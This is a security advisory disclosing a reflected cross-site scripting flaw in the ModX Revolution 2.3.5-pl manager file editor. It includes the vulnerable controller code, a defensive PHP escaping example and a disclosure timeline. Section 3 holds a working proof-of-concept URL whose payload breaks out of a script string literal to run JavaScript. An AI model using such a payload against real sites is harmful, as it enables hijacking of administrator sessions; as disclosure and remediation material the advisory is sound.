
ModX Revolution 2.3.5-pl: Reflected Cross Site Scripting Vulnerability
Date: 2015-08-17 09:27:03

1. Introduction
Affected Product: ModX Revolution 2.3.5-pl
Fixed in: 2.3.6
Fixed Version Link: 2.3.6
Vendor Contact: hello@modx.com
Vulnerability Type: Reflected XSS
Remote Exploitable: Yes
Reported to vendor: 07/14/2015
Disclosed to public: 08/17/2015
Release mode: Full disclosure
CVE: n/a
Credits: Tim Coen of Curesec GmbH
2. Vulnerability Description
ModX Revolution 2.3.5-pl is vulnerable to reflected cross-site scripting, which allows an attacker to inject and execute arbitrary JavaScript in the context of the affected manager page. An attacker can use this, for example, to inject a JavaScript keylogger, bypass CSRF protection, or perform phishing attacks.
The attack can be exploited by getting the victim to click a link or visit an attacker controlled website.
3. Proof of Concept
The injection point is the file GET parameter of the manager's file editor. Its value is written, without any encoding, into a JavaScript string literal inside an inline script block. A double quote in the parameter therefore terminates that literal; the rest of the payload supplies the record and canSave properties the template expects, closes the MODx.load() and Ext.onReady() calls so the script remains syntactically valid, runs the injected code (here alert(1)), and finally emits a closing script tag so that the remainder of the original template is rendered as plain page text instead of breaking the script. Because the affected controller lives under /manager/, the victim has to be a user with an active manager session.
http://localhost/modx-2.3.5-pl/manager/?a=system/file/edit&file=xsstest",record: {"name":"","basename":"","path":"","size":false,"last_accessed":"Jan 01, 1970 01:00:00 AM","last_modified":"Jan 01, 1970 01:00:00 AM","content":false,"image":false,"is_writable":false,"is_readable":false,"source":1},canSave: 0});});alert(1); </script>&wctx=mgr&source=1
4. Code
manager/controllers/default/system/file/edit.class.php:28

public function loadCustomCssJs() {
    $this->addJavascript($this->modx->getOption('manager_url').'assets/modext/sections/system/file/edit.js');
    // $this->filename comes from the file GET parameter and is concatenated
    // into a JavaScript string literal as-is; $this->fileRecord, by contrast,
    // is serialised through toJSON().
    $this->addHtml('<script type="text/javascript">Ext.onReady(function() {
        MODx.load({
            xtype: "modx-page-file-edit"
            ,file: "'.$this->filename.'"
            ,record: '.$this->modx->toJSON($this->fileRecord).'
            ,canSave: '.($this->canSave ? 1 : 0).'
        });
    });</script>');
}
5. Solution
At the time of public disclosure, no fix had been released by the vendor and we had received no reply to our reports.
Update: According to the vendor, the issue was fixed on GitHub on the day of our report. The fix was part of the 2.3.6 release on August 18, 2015.
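The following is an added example and not MODX code: it reproduces the inline-script pattern from edit.class.php in a stand-alone form, once with the raw interpolation and once with the filename emitted as a JSON string literal whose HTML-sensitive characters are hex-escaped. The function names (renderVulnerable, renderHardened, jsLiteral, selfCheck) are hypothetical, and the sample input is constructed from the proof of concept above. The point it makes is that escaping only the quote is not enough: the HTML tokenizer ends a script element at the first literal </script> regardless of JavaScript string context, so the closing tag sequence has to be neutralised as well.

```php
<?php
// Added example (not MODX code). Demonstrates why the raw concatenation
// in edit.class.php is exploitable and how a JSON string literal with
// HTML-sensitive characters hex-escaped prevents both break-outs.

// Constructed sample input: the payload from the proof of concept above.
$file = 'xsstest",record: {"name":""},canSave: 0});});alert(1); </script>';

// Vulnerable: $file lands inside a JS string literal with no encoding.
function renderVulnerable(string $file): string {
    return '<script type="text/javascript">Ext.onReady(function() {'
         . 'MODx.load({ xtype: "modx-page-file-edit", file: "' . $file . '" });'
         . '});</script>';
}

// Hardened: json_encode() produces a complete JS string literal (quotes
// included). JSON_HEX_QUOT/JSON_HEX_APOS escape quotes so the literal
// cannot be terminated early; JSON_HEX_TAG/JSON_HEX_AMP escape < > & so
// the HTML parser never sees a closing </script>. The default escaping
// of "/" as "\/" adds a second barrier against "</script>".
function jsLiteral($value): string {
    $json = json_encode(
        $value,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
    );
    if ($json === false) {
        throw new RuntimeException('json_encode failed: ' . json_last_error_msg());
    }
    return $json;
}

function renderHardened(string $file): string {
    return '<script type="text/javascript">Ext.onReady(function() {'
         . 'MODx.load({ xtype: "modx-page-file-edit", file: ' . jsLiteral($file) . ' });'
         . '});</script>';
}

// Self-check: the vulnerable output contains a premature </script> and a
// bare alert(1); the hardened output contains exactly one </script> and
// keeps the attacker's text inert inside the string literal.
function selfCheck(string $file): bool {
    $bad  = renderVulnerable($file);
    $good = renderHardened($file);
    return substr_count($bad, '</script>') === 2        // attacker closed the tag early
        && substr_count($good, '</script>') === 1       // only the real closing tag
        && strpos($good, '"xsstest\u0022') !== false    // the quote is now \u0022
        && strpos($good, '\u003C\/script\u003E') !== false; // the tag is now escaped
}

if (!selfCheck($file)) {
    fwrite(STDERR, "self-check failed\n");
    exit(1);
}
echo renderHardened($file), PHP_EOL;
```

Run with php on the command line; the printed script block contains the payload only as escape sequences inside the string literal. In the original template the record is already passed through toJSON(), so the fix amounts to treating the filename the same way rather than interpolating it raw.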
6. Report Timeline
07/14/2015 | Informed vendor about issue (no reply)
08/13/2015 | Contacted vendor again (no reply)
08/17/2015 | Disclosed to public
08/18/2015 | Vendor releases fix